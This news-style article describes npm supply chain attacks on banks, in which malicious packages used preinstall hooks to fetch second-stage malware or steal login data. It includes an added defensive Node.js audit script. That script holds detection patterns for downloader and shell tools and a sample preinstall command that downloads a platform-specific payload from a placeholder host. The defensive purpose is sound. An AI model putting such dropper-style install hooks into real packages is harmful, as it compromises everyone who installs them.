In a recent article, we highlighted the rise of software supply chain attacks. These attacks are particularly serious because the target is often not the software vendor itself but its customers: by gaining access to end users’ systems, attackers can steal valuable data, monitor organisations or individuals, or even extort money.

Whilst any company could be affected, a recently discovered open source software supply chain attack targeted the banking sector specifically. This is the first of its kind.

How did the attack work?

Earlier in 2023, attacks that targeted specific components in web assets used by banks were identified.

The attackers created fake LinkedIn profiles to contact employees at the target banks and set up a dedicated command and control (C2) server for each target. The two malicious npm packages (npm being the package registry through which JavaScript open source software is shared) used in the attacks included a preinstall script, which npm runs automatically when a package is installed and which was used to activate the multi-stage attack chain.

The script identified the host operating system (Windows, Linux or macOS) and downloaded the second-stage malware from a remote server hosted on an Azure CDN subdomain that included the name of the target bank. According to Checkmarx, the company that discovered the attack, the use of Azure CDN subdomains was particularly clever because it “bypassed traditional deny list methods due to Azure’s status as a legitimate service.”
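The install-time hook that the attack chain above relied on is something defenders can audit for. The following Node.js script is an added example, not code from the article or from Checkmarx; it scans package manifests for install-time lifecycle scripts and flags commands that look like they fetch or run a remote payload. The package names, the URL and the manifests it checks are constructed samples.

```javascript
// Added example, not code from the article or from Checkmarx.
// Audits npm package manifests for install-time lifecycle hooks (preinstall,
// install, postinstall, prepare), the hook the attack chain above relied on,
// and flags commands that look like they fetch or run a remote payload.
// Package names, the URL and the manifests below are constructed samples.

const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators; each is a [label, regex] pair. These catch common
// dropper patterns, not every possible one, so treat matches as a prompt
// to read the script, not as proof of malice.
const INDICATORS = [
  ["downloader", /\b(curl|wget|Invoke-WebRequest|iwr)\b/i],
  ["remote-url", /https?:\/\//i],
  ["inline-node", /\bnode\s+-e\b/i],
  ["shell-spawn", /\b(bash|sh|powershell|cmd)\b/i],
  ["os-fingerprint", /process\.platform|os\.platform/i],
];

// Returns one finding per install-time hook present in the manifest.
function auditPackage(manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const reasons = INDICATORS.filter(([, re]) => re.test(command)).map(([label]) => label);
    findings.push({ name: manifest.name, hook, command, risky: reasons.length > 0, reasons });
  }
  return findings;
}

// Audit a list of manifests (e.g. every package.json found under node_modules).
function auditAll(manifests) {
  return manifests.flatMap(auditPackage);
}

// Constructed sample manifests: a benign package, a native addon with a
// legitimate install hook, and one resembling the dropper described above.
const SAMPLES = [
  { name: "sample-utils", version: "1.0.0", scripts: { test: "node test.js" } },
  { name: "sample-native", version: "2.1.0", scripts: { install: "node-gyp rebuild" } },
  { name: "sample-dropper", version: "0.0.1", scripts: {
      preinstall: "node -e \"require('https').get('https://cdn.example.invalid/' + process.platform + '/stage2')\"" } },
];

for (const f of auditAll(SAMPLES)) {
  console.log(`${f.risky ? "RISKY " : "review"} ${f.name} ${f.hook}: ${f.reasons.join(",") || "no indicators"}`);
}
```

Setting `ignore-scripts=true` in `.npmrc` (or running `npm install --ignore-scripts`) stops these hooks from executing at all, at the cost of breaking packages that legitimately need them, such as native addons.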

A growing problem

A second, apparently unrelated attack on a different bank used an npm package developed to blend into the target’s website and lie dormant until triggered. It was specifically designed to covertly intercept login data and exfiltrate it to actor-controlled infrastructure.

Whilst the offending npm packages have since been removed, these are unlikely to be the last attacks of this kind on banks and other types of businesses. It is therefore crucial that companies prepare themselves to tackle such threats in future.